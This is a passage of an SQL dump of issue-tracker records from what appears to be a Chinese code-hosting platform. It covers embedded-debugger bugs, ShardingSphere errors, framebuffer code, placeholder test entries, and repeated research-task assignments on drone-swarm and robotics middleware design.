editor in the context of a prototype Electron\napplication, but we\'ll offer the standalone component as a separate\nbuild artifact from the main app.\n\nStandalone editor component (dev release)\nCRDT based text storage WebGL-based black and white text rendering\nRendering of glyphs with a 1:1 correspondence with characters Subpixel horizontal character positioning Multi-character graphemes\nCursors and selections\nRendering Basic movement Auto-scroll Advanced movement\nEditing\nInsert characters Copy and paste\nWeb-compatible build artifact Syntax highlighting History Synthetic scrollbars\nStretch\nAuto-indent File system interaction on the desktop',NULL,NULL,3,NULL,2,NULL,64,'2019-09-21 16:17:51','2019-11-08 14:50:47','2019-09-21',100,NULL,NULL,86,1,2,0,NULL,14,NULL,NULL,NULL,0,NULL,NULL,NULL),(87,2,199,'software breakpoint 清除返回错误 ','',NULL,NULL,3,NULL,2,NULL,65,'2019-11-08 11:19:24','2019-11-08 14:51:42','2019-09-24',100,NULL,NULL,87,1,2,0,NULL,15,NULL,NULL,NULL,0,NULL,NULL,NULL),(88,3,199,'验证不同的优化选项编译出来的RV-LINK没有问题','',NULL,NULL,3,NULL,2,NULL,49,'2019-11-08 11:21:08','2019-11-08 14:51:32','2019-09-27',100,NULL,NULL,88,1,2,0,NULL,16,NULL,NULL,NULL,0,NULL,NULL,NULL),(89,1,199,'GD32VF103 下载程序容易引起 E01 错误 ','加入重试机制,重试多次还失败再报错。',NULL,NULL,3,NULL,2,NULL,65,'2019-11-08 11:22:20','2019-11-08 14:49:33','2019-09-30',100,NULL,NULL,89,1,2,0,NULL,17,NULL,NULL,NULL,0,NULL,NULL,NULL),(91,1,199,'复位的系列问题','确认 target init 后,srst 的状态\n顺便把 rvl_target_reset 中的 rvl_jtag_delay(100 * 1000); 这句用 PT_WAIT_* 来实现。\nGDB 连接后,通过 dmactive 复位 DM。\n使用 dmcontrol.hartreset 复位?',NULL,NULL,3,NULL,2,NULL,46,'2019-11-08 11:27:07','2019-11-08 14:49:43','2019-10-11',100,NULL,NULL,91,1,2,0,NULL,18,NULL,NULL,NULL,0,NULL,NULL,NULL),(92,1,199,'JTAG建议用SPI+DMA ','gdlink就是用GPIO模拟的,速度非常慢\n进一步提升TCK频率。\n如果使用SPI,Longan Nano 就不能使用复用JTAG slave 接口做 JTAG master了。',NULL,NULL,3,NULL,2,NULL,46,'2019-11-08 11:28:56','2019-11-08 14:49:53','2019-10-14',100,NULL,NULL,92,1,2,0,NULL,19,NULL,NULL,NULL,0,NULL,NULL,NULL),(93,1,199,'嵌入式ARM上使用fb显示,颜色不对','int fb_update(void)\n{\nvinfo.yoffset= 0;\nif(ioctl(fb_fd, FBIOPAN_DISPLAY, &vinfo) < 0)\n{\nprintf(\"Cannot display Pan\\n.\");\nreturn -1;\n}\nreturn 0;\n}\n\nvoid create_ui(void* phy_fb, int screen_width, int screen_height, int color_bytes, struct EXTERNAL_GFX_OP* gfx_op) {\nc_display display = c_display(phy_fb, screen_width, screen_height, UI_WIDTH, UI_HEIGHT, color_bytes, 1, gfx_op);\ns_surface = display.alloc_surface((void*)1, Z_ORDER_LEVEL_0);\ns_surface->set_active(true);\n\ns_surface->fill_rect(0, 0, UI_WIDTH - 1, UI_HEIGHT - 1, 0, Z_ORDER_LEVEL_0);\nint flag = 0;\nwhile(1) {\n for (int i = 0; i < sizeof(stars)/sizeof(c_star); i++) {\n stars[i].move();\n }\n thread_sleep(50);\n fb_update();\n}\n}\n\n通过排查发现,在每次更改fb后,需要调用fb_update(),颜色就可以显示正常',NULL,NULL,3,NULL,2,10,66,'2019-11-10 12:44:07','2019-11-11 08:13:41','2019-10-29',100,NULL,NULL,93,1,2,0,NULL,20,NULL,NULL,NULL,0,NULL,NULL,NULL),(94,1,199,'在嵌入式海思平台上,使用HDMI输出,信息显示不全,但是程序截图后的图片是显示完整的','',NULL,NULL,3,NULL,2,10,66,'2019-11-10 12:44:50','2019-11-11 08:13:21','2019-10-19',100,NULL,NULL,94,1,2,0,NULL,21,NULL,NULL,NULL,0,NULL,NULL,NULL),(95,1,199,'添加多系统的支持','添加对各种嵌入式系统的支持,比如RT-Thread、FreeRTOS等,通过添加系统宏定义与锁的定义选择即可。',NULL,NULL,3,NULL,2,10,66,'2019-11-10 12:45:33','2019-11-11 08:13:10','2019-10-27',100,NULL,NULL,95,1,2,0,NULL,22,NULL,NULL,NULL,0,NULL,NULL,NULL),(96,1,199,'c1p13','越来越多精密的集成电路出现在市面上,过去庞然大物才能实现的运算能力现在小小的芯片就能实现。我预言在本世纪末人们给孩子买的玩具运算能力可以和数百万美元一台的IBM计算机匹敌,计算机的主要成本集中反而在键盘之类的配件上。基本计算机的价格没有大跳水,今天的超级计算机在将来可能比打字机电视机都便宜。\n\n随着集成电路的技术不断精进,过去庞然大物才能实现的运算能力现在小小的芯片就能实现。我预言在本世纪末人们给孩子买的玩具运算能力可以和数百万美元一台的IBM计算机匹敌,未来计算机的主要成本集中反而在键盘之类的配件上。即使这些配件的价格没有大跳水,这些玩具未来的零售价与打字机电视机也不会相差太多',NULL,NULL,3,NULL,2,10,66,'2019-11-10 12:46:08','2019-11-11 08:12:56','2019-10-23',100,NULL,NULL,96,1,2,0,NULL,23,NULL,NULL,NULL,0,NULL,NULL,NULL),(97,2,208,'开源资料库不全','补充资料库',NULL,NULL,1,NULL,2,NULL,46,'2019-11-11 09:59:55','2019-11-11 10:00:12','2019-11-11',0,NULL,NULL,97,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(98,1,199,'springboot jpa 2.1.8无法连接 ','\nCaused by: com.mysql.cj.exceptions.UnableToConnectException: CLIENT_PLUGIN_AUTH is required\n\n报这个异常,网上说版本太高,我的mysql 是8.0.17,于是我又换了驱动版本5.1.47\n然后又是这个异常\njava.sql.SQLException: Unknown system variable \'query_cache_size\'\n',NULL,NULL,3,NULL,2,NULL,46,'2019-11-11 10:28:02','2019-11-11 14:26:53','2019-11-11',100,NULL,NULL,98,1,2,0,NULL,24,NULL,NULL,NULL,0,NULL,NULL,NULL),(99,1,199,'分页改写问题','不参与分表的SQL能不能不被改写呀?比如limit 2,10被改写成了limit 0,12.\n我还有其他问题,如 add 1, 7',NULL,NULL,3,NULL,2,NULL,66,'2019-11-11 10:29:15','2019-11-22 09:44:13','2019-11-11',100,NULL,NULL,99,1,2,0,NULL,25,NULL,NULL,NULL,0,NULL,NULL,NULL),(100,1,199,'mvn install ,build source code failure(mvn install 编译源码失败) ','error message web link:\nhttps://paste.ubuntu.com/p/xymsFF7yry/\n\nOS: Windows 10\nmaven version3.0\nApache Maven 3.5.3\nsharding-sphere version\ndev branch',NULL,NULL,2,66,2,NULL,64,'2019-11-11 10:33:16','2019-11-22 10:44:18','2019-11-11',50,NULL,NULL,100,1,2,0,NULL,26,NULL,NULL,NULL,0,NULL,NULL,NULL),(101,1,199,'集成springboot,insert 报空指针异常 sharding-jdbc-spring-boot-starter 2','Caused by: java.lang.NullPointerException\nat io.shardingsphere.core.jdbc.metadata.dialect.JDBCShardingRefreshHandler.execute(JDBCShardingRefreshHandler.java:49)\nat io.shardingsphere.core.jdbc.core.statement.ShardingPreparedStatement.execute(ShardingPreparedStatement.java:159)\nat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\nat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\nat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\nat java.lang.reflect.Method.invoke(Method.java:498)\nat org.apache.ibatis.logging.jdbc.PreparedStatementLogger.invoke(PreparedStatementLogger.java:59)\nat com.sun.proxy.$Proxy96.execute(Unknown Source)\nat org.apache.ibatis.executor.statement.PreparedStatementHandler.update(PreparedStatementHandler.java:46)\nat org.apache.ibatis.executor.statement.RoutingStatementHandler.update(RoutingStatementHandler.java:74)\nat org.apache.ibatis.executor.SimpleExecutor.doUpdate(SimpleExecutor.java:50)\nat org.apache.ibatis.executor.BaseExecutor.update(BaseExecutor.java:117)\nat org.apache.ibatis.executor.CachingExecutor.update(CachingExecutor.java:76)\nat org.apache.ibatis.session.defaults.DefaultSqlSession.update(DefaultSqlSession.java:198)\n... 40 more\n... 45 goto org.171',NULL,NULL,3,NULL,2,NULL,64,'2019-11-11 10:35:21','2019-11-22 09:56:37','2019-11-11',100,NULL,NULL,101,1,2,0,NULL,27,NULL,NULL,NULL,0,NULL,NULL,NULL),(102,1,232,'riscv-prober应该增加 abstractauto 的检测','只有 target 支持 abstractauto,才能加速 GPRs 和内存的读取。',NULL,NULL,1,NULL,2,NULL,64,'2019-11-11 17:13:17','2019-11-11 17:13:34','2019-11-11',0,NULL,NULL,102,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(103,1,234,'ww','ww',NULL,NULL,1,NULL,2,NULL,49,'2019-11-12 09:05:56','2019-11-12 09:05:56','2019-11-12',0,NULL,NULL,103,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(104,1,235,'sdfas','dfasdfa',NULL,NULL,1,NULL,2,NULL,49,'2019-11-12 09:18:38','2019-11-12 09:18:38','2019-11-12',0,NULL,NULL,104,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(105,1,237,'sdfa','asdf',NULL,NULL,1,NULL,2,NULL,49,'2019-11-12 10:16:03','2019-11-12 10:16:03','2019-11-12',0,NULL,NULL,105,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(108,1,199,'mvn install ,build source code failure(mvn install 编译源码失败) ','error message web link:\nhttps://paste.ubuntu.com/p/xymsFF7yry/\n\nOS: Windows 10\nmaven version3.0。1\nApache Maven 3.5.3\nsharding-sphere version\ndev branch',NULL,NULL,3,NULL,2,NULL,46,'2019-11-22 09:27:07','2019-11-22 09:27:07','2019-11-11',100,NULL,NULL,108,1,2,0,NULL,28,NULL,NULL,NULL,0,NULL,NULL,NULL),(110,1,199,'分页改写问题','不参与分表的SQL能不能不被改写呀?比如limit 2,10被改写成了limit 0,12.\n我还有其他问题,如 add 1, 7',NULL,NULL,3,NULL,2,NULL,46,'2019-11-22 10:30:35','2019-11-22 10:30:35','2019-11-11',100,NULL,NULL,110,1,2,0,NULL,29,NULL,NULL,NULL,0,NULL,NULL,NULL),(111,1,251,'Test.h存在内存泄漏的风险','代码第一行没有引用正确的.h文件。```cpp\n#include \"aaa.h\"\n```','2020-02-26',NULL,1,75,2,NULL,76,'2020-02-04 22:00:33','2020-02-04 22:00:33','2020-02-04',0,1,NULL,111,1,2,1,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(112,4,255,'算法调研','《无人机手册》109-125章\n《机器人手册》第1-9章\n每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,89,2,21,81,'2020-02-11 09:54:10','2020-02-11 11:29:44','2020-02-11',0,NULL,NULL,112,1,2,1,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(113,4,255,'算法调研','《无人机手册》74-80章\n《无人机手册》97-105章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,91,2,21,81,'2020-02-11 10:04:09','2020-02-11 10:04:09','2020-02-11',0,NULL,NULL,113,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(114,4,255,'算法调研','《无人机手册》19-23章\n《无人机手册》70-73章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,98,2,21,81,'2020-02-11 10:05:52','2020-02-11 21:01:22','2020-02-11',0,NULL,NULL,114,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(115,4,255,'算法调研','《无人机手册》106-108章\n《无人机手册》16-18章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,80,2,21,81,'2020-02-11 10:07:24','2020-03-19 14:13:32','2020-02-11',100,NULL,NULL,115,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(116,4,255,'算法调研','《无人机手册》30-39章\n《无人机手册》48-58章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,86,2,21,81,'2020-02-11 10:10:24','2020-02-11 10:10:24','2020-02-11',0,NULL,NULL,116,1,2,1,NULL,5,NULL,NULL,NULL,0,NULL,NULL,NULL),(117,4,255,'算法调研','《机器人手册》第10-18章\n《机器人手册》第34-41章\n《机器人手册》第42-55章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,92,2,21,81,'2020-02-11 10:11:35','2020-02-11 10:11:35','2020-02-11',0,NULL,NULL,117,1,2,1,NULL,6,NULL,NULL,NULL,0,NULL,NULL,NULL),(118,4,255,'算法调研','《无人机手册》40-47章\n《无人机手册》86-96章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,95,2,21,81,'2020-02-11 10:12:28','2020-02-11 10:12:28','2020-02-11',0,NULL,NULL,118,1,2,1,NULL,7,NULL,NULL,NULL,0,NULL,NULL,NULL),(119,4,255,'算法调研','《机器人手册》第26-33章\n《无人机手册》26-30章\n《无人机手册》81-85章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,87,2,21,81,'2020-02-11 10:14:14','2020-02-11 10:14:14','2020-02-11',0,NULL,NULL,119,1,2,1,NULL,8,NULL,NULL,NULL,0,NULL,NULL,NULL),(120,4,255,'算法调研','《无人机手册》59-69章\n《机器人手册》第56-64章\n\n任务要求:每人将分配到的章节仔细阅读,汇总其中涉及到的算法【注意:不止DA,是所有的算法!!!】,填写《算法汇总表》,务必全面仔细\n除了《无人机手册》和《机器人手册》,如果有其他算法,也可以列进汇总表','2020-02-16',NULL,1,81,2,21,81,'2020-02-11 10:15:28','2020-02-11 10:15:28','2020-02-11',0,NULL,NULL,120,1,2,1,NULL,9,NULL,NULL,NULL,0,NULL,NULL,NULL),(121,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,95,2,21,81,'2020-02-11 10:19:27','2020-02-11 10:19:27','2020-02-11',0,NULL,NULL,121,1,2,1,NULL,10,NULL,NULL,NULL,0,NULL,NULL,NULL),(122,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小','2020-02-16',NULL,1,81,2,21,81,'2020-02-11 10:19:58','2020-02-11 10:20:52','2020-02-11',0,NULL,NULL,122,1,2,1,NULL,11,NULL,NULL,NULL,0,NULL,NULL,NULL),(123,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,91,2,21,81,'2020-02-11 10:22:01','2020-02-11 10:22:01','2020-02-11',0,NULL,NULL,123,1,2,1,NULL,12,NULL,NULL,NULL,0,NULL,NULL,NULL),(124,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,91,2,21,81,'2020-02-11 10:22:04','2020-02-11 10:22:04','2020-02-11',0,NULL,NULL,124,1,2,1,NULL,13,NULL,NULL,NULL,0,NULL,NULL,NULL),(125,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,89,2,21,81,'2020-02-11 10:22:56','2020-02-11 11:31:22','2020-02-11',0,NULL,NULL,125,1,2,0,NULL,14,NULL,NULL,NULL,0,NULL,NULL,NULL),(126,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,86,2,21,81,'2020-02-11 10:23:32','2020-02-11 10:42:16','2020-02-11',0,NULL,NULL,126,1,2,1,NULL,15,NULL,NULL,NULL,0,NULL,NULL,NULL),(127,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,87,2,21,81,'2020-02-11 10:24:14','2020-02-11 10:24:14','2020-02-11',0,NULL,NULL,127,1,2,1,NULL,16,NULL,NULL,NULL,0,NULL,NULL,NULL),(128,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,92,2,21,81,'2020-02-11 10:24:55','2020-02-11 10:24:55','2020-02-11',0,NULL,NULL,128,1,2,1,NULL,17,NULL,NULL,NULL,0,NULL,NULL,NULL),(129,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,80,2,21,81,'2020-02-11 10:25:44','2020-02-24 18:32:32','2020-02-11',100,NULL,NULL,129,1,2,1,NULL,18,NULL,NULL,NULL,0,NULL,NULL,NULL),(130,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,77,2,21,81,'2020-02-11 10:26:30','2020-02-11 10:26:30','2020-02-11',0,NULL,NULL,130,1,2,1,NULL,19,NULL,NULL,NULL,0,NULL,NULL,NULL),(131,4,255,'ZZ任务分析、详细设计报告','《蜂群武器系统》和《无人机协同决策与控制》书中典型zz任务中的DA设计:蜂群攻破【任维雅、王玲】、蜂群区域防御【周浩】、蜂群广域情报、监视与侦察【刘艺、赵林、张韬】、蜂群并行作战【武云龙、李晶华】、WASM【任小广】、虚拟航迹【王彦臻】,具体资料详见附件。\n\n请每个人做一份PPT报告,对所负责的ZZ应用场景方案做如下讨论:ZZ流程场景、涉及的技术问题、DA组涉及的任务、DA在其中任务的设计与实现方案,其他需要讨论的问题。\n\n2.14晚8点前提交初稿给任小广\n2.16晚8点前提交终稿给任小广','2020-02-16',NULL,1,98,2,21,81,'2020-02-11 10:27:27','2020-02-11 10:27:27','2020-02-11',0,NULL,NULL,131,1,2,1,NULL,20,NULL,NULL,NULL,0,NULL,NULL,NULL),(132,2,255,'开源项目分析','1.对BUZZ开源项目进行背景、功能和总体代码框架分析,组织一次ppt全组汇报;\n2.对该开源项目的关键模块进行code review (10000行以上),绘制模块间调用关系图;\n3.提出二次开发方案,基于该代码进行功能模块或应用设计,并分析micROS可借鉴和可结合的部分,组织一次ppt应用演示汇报。\n\n','2020-02-29',NULL,1,100,2,21,99,'2020-02-11 16:39:25','2020-02-13 08:26:49','2020-02-11',10,NULL,NULL,132,1,2,1,NULL,21,NULL,NULL,NULL,0,NULL,NULL,NULL),(133,2,255,'开源项目分析','1. 对Kaldi开源项目进行背景、功能和总体代码框架分析,组织一次ppt全组汇报;\n2. 对开源项目的关键模块进行code review(10000行以上),绘制模块间调用关系图;\n3. 提出二次开发方案,基于该代码进行功能模块或应用设计,并分析micROS可借鉴和可结合的部分,组织一次ppt应用演示汇报。\n\n','2020-02-29',NULL,1,102,2,21,99,'2020-02-11 16:40:27','2020-02-13 08:26:15','2020-02-11',0,NULL,NULL,133,1,2,0,NULL,22,NULL,NULL,NULL,0,NULL,NULL,NULL),(134,2,255,'开源项目分析','1.对PHOENIXEngine开源项目进行背景、功能和总体代码框架分析,组织一次ppt全组汇报;\n2.对该开源项目的关键模块进行code review (10000行以上),绘制模块间调用关系图;\n3.提出二次开发方案,基于该代码进行功能模块或应用设计,并分析micROS可借鉴和可结合的部分,组织一次ppt应用演示汇报。\n','2020-02-29',NULL,1,101,2,21,99,'2020-02-11 16:45:53','2020-02-13 08:25:36','2020-02-11',0,NULL,NULL,134,1,2,1,NULL,23,NULL,NULL,NULL,0,NULL,NULL,NULL),(135,4,255,'角色面向案例的需求分析和初步设计','1. 进行六个典型案例分析\n2. 形成案例需求和初步设计(ppt形式)','2020-02-29',NULL,1,90,2,21,99,'2020-02-11 17:02:48','2020-02-11 17:03:23','2020-02-11',0,NULL,NULL,135,1,2,1,NULL,24,NULL,NULL,NULL,0,NULL,NULL,NULL),(136,4,255,'场景框架设计','1.场景控制器数据结构设计,细化场景控制器构成、运转机制\n2.场景视图管理数据结构设计,细化视图管理API、与角色的对接方式\n3.场景集数据结构设计,对照任务清单,细化场景集的生命周期、运转流程\n4.找一个案例,把场景在任务中的作用体现出来\n','2020-02-14',NULL,1,97,2,21,83,'2020-02-11 19:52:24','2020-02-12 08:35:27','2020-02-11',0,NULL,NULL,136,1,2,0,NULL,25,NULL,NULL,NULL,0,NULL,NULL,NULL),(137,4,255,'感知数据管理-环境层设计','1.选取典型的地理信息系统、SLAM点云数据管理系统、代价地图系统,为下阶段任务做准备\n2.梳理环境层都支持哪些数据格式,支持哪些数据操作(与上层业务要有切分)\n3.参考costmap2d的插件机制,初步设计感知数据管理的软件总线,如何挂载环境层的各数据处理系统、如何挂载已有数据的系统、如何允许用户自定义层','2020-02-14',NULL,1,76,2,21,83,'2020-02-11 19:59:30','2020-02-11 19:59:30','2020-02-11',0,NULL,NULL,137,1,2,0,NULL,26,NULL,NULL,NULL,0,NULL,NULL,NULL),(138,4,255,'实时增强任务设计','1.继续调研orocus rtt以及orocus为ros做的支撑\n2.针对micros的任务,细化结点级实时在哪些方面要增强\n3.基于orocus,我们要封装哪些数据结构和API\n4.目前没有考虑载荷的实时控制,考虑设备驱动的实时性,我们能做哪些支撑','2020-02-14',NULL,1,82,2,21,83,'2020-02-11 20:04:38','2020-02-11 20:04:38','2020-02-11',0,NULL,NULL,138,1,2,0,NULL,27,NULL,NULL,NULL,0,NULL,NULL,NULL),(139,4,255,'感知数据管理-我方b力层和d方目标层设计','1.继续深化我方b力层和d方目标层都支持哪些数据格式,支持哪些数据操作(与上层业务要有切分)\n2.继续深化d方目标层的数据处理回调机制,为插件提供数据处理自定义接口\n3.参考costmap2d的插件机制,初步设计感知数据管理的软件总线,如何挂载环境层的各数据处理系统、如何挂载已有数据的系统、如何允许用户自定义层\n4.针对位置信息,制定数据格式标准','2020-02-14',NULL,1,83,2,21,83,'2020-02-11 20:08:12','2020-02-11 20:08:12','2020-02-11',0,NULL,NULL,139,1,2,0,NULL,28,NULL,NULL,NULL,0,NULL,NULL,NULL),(142,2,370,'Develop Branch for testing create by Limj','测试分支合并',NULL,NULL,1,NULL,1,NULL,46,'2020-08-13 01:05:21','2020-08-14 00:55:56',NULL,0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'pull_request',NULL,NULL),(143,1,376,'开源项目里登录用户,其他模块是未登录状态',NULL,NULL,NULL,3,47,3,NULL,1,'2020-08-13 01:58:08','2020-08-19 01:57:20','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(144,1,376,'开源项目后台未接入','管理员身份在后台管理页面点击开源项目,出现500',NULL,NULL,3,47,1,NULL,1,'2020-08-13 02:01:15','2020-08-24 07:00:31','2020-08-13',100,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(145,1,376,'后台管理中,现在前端的开源项目好像没有出现','后台管理中,现在前端的开源项目好像没有出现,可能是数据库不一致吧',NULL,NULL,1,NULL,1,NULL,46,'2020-08-13 02:01:45','2020-08-13 06:04:17','2020-08-13',0,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'1',NULL,'',0,'issue',NULL,''),(146,1,376,'开源项目点击创建文件有问题,出现白屏','开源项目点击创建文件有问题,出现白屏',NULL,NULL,3,47,1,NULL,46,'2020-08-13 02:02:52','2020-08-13 